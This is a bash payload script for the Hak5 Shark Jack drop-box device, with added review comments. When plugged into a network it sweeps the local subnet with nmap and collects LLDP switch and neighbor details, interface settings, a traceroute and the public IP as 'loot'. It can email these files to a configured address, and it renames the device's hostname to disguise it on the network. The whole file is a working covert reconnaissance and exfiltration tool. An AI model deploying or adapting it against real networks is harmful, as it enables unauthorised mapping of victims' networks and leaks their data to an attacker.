#!/bin/bash
#
# Title: Network Recon Payload with email exfiltration
# Author: Topknot (Based on the original HAK5 sample payload and MonsieurMarc Sample Nmap Payload with Pastebin exfiltration)
# Version: 1.2
#
# This payload:
#
# Version 1.1: Make e-mail optional, set DNS as variable
# Version 1.2: Add ability to change system hostname
#
# Performs an nmap ping scan of the local subnet and logs it to a text file
# Pulls LLDP neighbor and switch information and logs it to a text file
# Performs an ifconfig and ip addr show and logs it to a text file
# Performs a traceroute to 8.8.8.8 and logs it to a text file
# Performs a public IP address lookup via curl and icanhazip.com and logs it to a text file
# Optionally sends all of the created text files via email to the address set with MAIL_RCPT
#
# A nameserver, 1.1.1.1 by default, is set for the payload in case you want to run it in arming mode.
# The HOSTNAME variable can be set to change the system hostname, helping disguise the device.
#
# This payload requires you to have curl, lldpd, and (optionally) msmtp and mutt already installed and configured via opkg
#
# Guide for MSMTP MUTT can be found here https://forum.openwrt.org/t/openwrt-how-to-send-mail-with-attachment-with-mutt-and-msmtp-gmail/45844
#
# Red ...........Setup
# Amber..........Scanning
# Green..........Finished
#
# See nmap --help for options. Default "-sP" ping scans the address space for
# fast host discovery.
#
# Please enter your email details below. Set SEND_EMAIL=y to send e-mail.
#
# ---- Configuration -------------------------------------------------------
# Every value below is read as a global by the functions further down.
# Set SEND_EMAIL=y and MAIL_RCPT to have finish() mail the loot out.
SEND_EMAIL=n
MAIL_RCPT=EnterEmail@Here.com
# Expanded unquoted on the nmap command line on purpose, so that several
# options can be given in one string.
NMAP_OPTIONS="-sP"
# Loot output directories (one text file per run per tool).
LOOT_DIR_NMAP=/root/loot/nmap
LOOT_DIR_LLDPD=/root/loot/lldpd
LOOT_DIR_IFCONFIG=/root/loot/ifconfig
LOOT_DIR_TRACEROUTE=/root/loot/traceroute
LOOT_DIR_ICANHAZIP=/root/loot/icanhazip
# Per-tool run counters live under these directories so that each run gets
# a fresh loot file number (see the *-count files created in setup()).
SCAN_DIR=/etc/shark/nmap
LLDPD_DIR=/etc/shark/lldpd
IFCONFIG_DIR=/etc/shark/ifconfig
TRACEROUTE_DIR=/etc/shark/traceroute
ICANHAZIP_DIR=/etc/shark/icanhazip
# Overwritten by setup() with a single nameserver line.
DNS_FILE=/etc/resolv.conf
# mutt configuration read by email(); the mail account settings (and,
# presumably, its credentials) live in this file on the device.
MUTT_FILE=/root/.muttrc
NAMESERVER=1.1.1.1
# NOTE: this shadows bash's own HOSTNAME variable; harmless here because the
# value is only consumed by the `uci set` call in setup().
HOSTNAME=shark

#######################################
# End of run: reap nmap, persist the run counters, optionally mail the
# loot, then power the device off.
# Globals:   SCAN_M, LLDPD_M, IFCONFIG_M, TRACEROUTE_M, ICANHAZIP_M (read)
#            SCAN_FILE, LLDPD_FILE, IFCONFIG_FILE, TRACEROUTE_FILE,
#            ICANHAZIP_FILE, SEND_EMAIL (read)
# Arguments: $1 - PID of the background nmap started in run()
# Returns:   never returns; ends with halt
#######################################
function finish() {
  LED CLEANUP
  # Kill Nmap
  # wait blocks until nmap has exited on its own, so the kill that follows is
  # normally a no-op; it only matters if wait returned early.
  wait $1
  kill $1 &> /dev/null
  # Sync filesystem
  # Write the incremented counters back so the next run picks new file names.
  echo $SCAN_M > $SCAN_FILE
  echo $LLDPD_M > $LLDPD_FILE
  echo $IFCONFIG_M > $IFCONFIG_FILE
  echo $TRACEROUTE_M > $TRACEROUTE_FILE
  echo $ICANHAZIP_M > $ICANHAZIP_FILE
  sync
  sleep 1s
  #Email the loot as an attachment
  # NOTE(review): $SEND_EMAIL is unquoted; if it is ever empty the test
  # errors out and the branch is silently skipped instead of failing loudly.
  if [ $SEND_EMAIL = "y" ]; then
    email
    sleep 5s
  fi
  LED FINISH
  sleep 1s
  # Halt system
  # The loot text files stay under the LOOT_DIR_* paths after power-off.
  halt
}

#######################################
# Bring up networking and prepare loot/counter directories.
# Globals:   NAMESERVER, DNS_FILE, HOSTNAME, LOOT_DIR_*, *_DIR (read)
#            SCAN_FILE, LLDPD_FILE, IFCONFIG_FILE, TRACEROUTE_FILE,
#            ICANHAZIP_FILE, SUBNET (written)
# Arguments: none
# Returns:   0 once SUBNET has been determined (blocks until then)
#######################################
function setup() {
  LED SETUP
  # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+
  NETMODE DHCP_CLIENT
  # Wait for an IP address to be obtained
  # Busy-waits (1 s polls) on eth0 having an IPv4 address; there is no
  # timeout, so with no DHCP lease the payload never gets past this point.
  while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done
  # Configure DNS Server
  # Replaces resolv.conf with "nameserver  1.1.1.1" (two spaces: the trailing
  # space inside the quotes plus echo's argument separator); resolvers are
  # presumably tolerant of the extra whitespace — verify on the device.
  echo "nameserver " $NAMESERVER > $DNS_FILE
  # Create loot directory
  mkdir -p $LOOT_DIR_NMAP &> /dev/null
  # Create tmp scan directory
  mkdir -p $SCAN_DIR &> /dev/null
  # Create tmp scan file if it doesn't exist
  # Counter files are seeded with 0 on first run and incremented in run().
  SCAN_FILE=$SCAN_DIR/scan-count
  if [ ! -f $SCAN_FILE ]; then
    touch $SCAN_FILE && echo 0 > $SCAN_FILE
  fi
  # Create lldpd loot directory
  mkdir -p $LOOT_DIR_LLDPD &> /dev/null
  #Create tmp lldpd directory
  mkdir -p $LLDPD_DIR &> /dev/null
  #Create tmp lldpd file if it doesn't exist
  LLDPD_FILE=$LLDPD_DIR/lldpd-count
  if [ ! -f $LLDPD_FILE ]; then
    touch $LLDPD_FILE && echo 0 > $LLDPD_FILE
  fi
  # Create ifconfig loot directory
  mkdir -p $LOOT_DIR_IFCONFIG &> /dev/null
  #Create tmp ifconfig directory
  mkdir -p $IFCONFIG_DIR &> /dev/null
  #Create tmp ifconfig file if it doesn't exist
  IFCONFIG_FILE=$IFCONFIG_DIR/ifconfig-count
  if [ ! -f $IFCONFIG_FILE ]; then
    touch $IFCONFIG_FILE && echo 0 > $IFCONFIG_FILE
  fi
  # Create traceroute loot directory
  mkdir -p $LOOT_DIR_TRACEROUTE &> /dev/null
  #Create tmp traceroute directory
  mkdir -p $TRACEROUTE_DIR &> /dev/null
  #Create tmp traceroute file if it doesn't exist
  TRACEROUTE_FILE=$TRACEROUTE_DIR/traceroute-count
  if [ ! -f $TRACEROUTE_FILE ]; then
    touch $TRACEROUTE_FILE && echo 0 > $TRACEROUTE_FILE
  fi
  # Create icanhazip loot directory
  mkdir -p $LOOT_DIR_ICANHAZIP &> /dev/null
  #Create tmp icanhazip directory
  mkdir -p $ICANHAZIP_DIR &> /dev/null
  #Create tmp icanhazip file if it doesn't exist
  ICANHAZIP_FILE=$ICANHAZIP_DIR/icanhazip-count
  if [ ! -f $ICANHAZIP_FILE ]; then
    touch $ICANHAZIP_FILE && echo 0 > $ICANHAZIP_FILE
  fi
  # Set system hostname
  # NOTE(review): `uci commit` writes the change to the device's config, so
  # the new hostname is kept across reboots, not just for this run.
  uci set system.@system[0].hostname=$HOSTNAME
  uci commit system
  /etc/init.d/system reload
  # Find IP address and subnet
  # Polls find_subnet() every second until it yields a value (no timeout).
  while [ -z "$SUBNET" ]; do
    sleep 1s && find_subnet
  done
}

#######################################
# Derive the local network in CIDR form from eth0's address.
# Globals:   SUBNET (written)
# Arguments: none
# Outputs:   none; result is stored in SUBNET
#######################################
function find_subnet() {
  # The grep -E pattern pulls the first "a.b.c.d/nn" found on eth0's inet
  # lines; sed then rewrites the last octet to 0 (e.g. 10.1.2.37/24 ->
  # 10.1.2.0/24). The prefix length is kept as-is, so for masks other than
  # /24 the network address is only approximate — presumably nmap derives
  # the range from the prefix anyway; verify for such networks.
  SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
}

#######################################
# Main payload sequence: setup, collect each artifact, then finish.
# Globals:   NMAP_OPTIONS, SUBNET, LOOT_DIR_*, *_FILE (read)
#            SCAN_N/SCAN_M, LLDPD_N/LLDPD_M, IFCONFIG_N/IFCONFIG_M,
#            TRACEROUTE_N/TRACEROUTE_M, ICANHAZIP_N/ICANHAZIP_M, tpid (written)
# Arguments: none
# Returns:   never returns; finish() halts the device
#######################################
function run() {
  # Run setup
  setup
  #Preflight NMAP
  # *_N is the stored counter, *_M the number used for this run's loot file.
  SCAN_N=$(cat $SCAN_FILE)
  SCAN_M=$(( $SCAN_N + 1 ))
  LED ATTACK
  #Start nmap scan
  # Backgrounded so the other collectors run while nmap sweeps the subnet;
  # finish() waits on $tpid. A ping sweep of the whole subnet is easily
  # visible to network monitoring.
  nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR_NMAP/nmap-scan_$SCAN_M.txt &>/dev/null &
  tpid=$!
  # Preflight LLDPD
  LLDPD_N=$(cat $LLDPD_FILE)
  LLDPD_M=$(( $LLDPD_N + 1 ))
  #Start LLDPD
  # Both lldpcli outputs go into the same loot file (second one appended).
  lldpcli show neighbor details > $LOOT_DIR_LLDPD/lldpd_$LLDPD_M.txt
  lldpcli show interfaces details >> $LOOT_DIR_LLDPD/lldpd_$LLDPD_M.txt
  # Preflight IFCONFIG
  IFCONFIG_N=$(cat $IFCONFIG_FILE)
  IFCONFIG_M=$(( $IFCONFIG_N + 1 ))
  #Start IFCONFIG
  ifconfig eth0 > $LOOT_DIR_IFCONFIG/ifconfig_$IFCONFIG_M.txt
  ip addr show dev eth0 >> $LOOT_DIR_IFCONFIG/ifconfig_$IFCONFIG_M.txt
  # Preflight TRACEROUTE
  TRACEROUTE_N=$(cat $TRACEROUTE_FILE)
  TRACEROUTE_M=$(( $TRACEROUTE_N + 1 ))
  #Start TRACEROUTE
  traceroute 8.8.8.8 > $LOOT_DIR_TRACEROUTE/traceroute_$TRACEROUTE_M.txt
  # Preflight ICANHAZIP
  ICANHAZIP_N=$(cat $ICANHAZIP_FILE)
  ICANHAZIP_M=$(( $ICANHAZIP_N + 1 ))
  #Start ICANHAZIP
  # Plain HTTP request (no scheme given, so curl defaults to http://); the
  # lookup and the preceding DNS query to NAMESERVER are both observable
  # on the wire. curl errors are not checked, so the file may be empty.
  curl icanhazip.com > $LOOT_DIR_ICANHAZIP/icanhazip_$ICANHAZIP_M.txt
  #End Payloads
  finish $tpid
}

#######################################
# Mail all five loot files of this run as attachments.
# Globals:   MUTT_FILE, MAIL_RCPT, LOOT_DIR_*, SCAN_M, LLDPD_M, IFCONFIG_M,
#            TRACEROUTE_M, ICANHAZIP_M (read)
# Arguments: none
# Returns:   mutt's exit status (not checked by the caller)
#######################################
function email() {
  #Send the loot files to the email destination via msmtp
  # The piped echo becomes the message body; -F selects the mutt config that
  # holds the sending account; `--` ends option parsing before the recipient.
  echo "Yarr, You have new loot from Shark Jack!" | mutt -F $MUTT_FILE -a $LOOT_DIR_NMAP/nmap-scan_$SCAN_M.txt -a $LOOT_DIR_LLDPD/lldpd_$LLDPD_M.txt -a $LOOT_DIR_IFCONFIG/ifconfig_$IFCONFIG_M.txt -a $LOOT_DIR_TRACEROUTE/traceroute_$TRACEROUTE_M.txt -a $LOOT_DIR_ICANHAZIP/icanhazip_$ICANHAZIP_M.txt -s "Shark Jack Loot" -- $MAIL_RCPT
}

# Run payload
# Backgrounded so this script returns immediately; run() continues on its
# own and the device is halted by finish() when it is done.
run &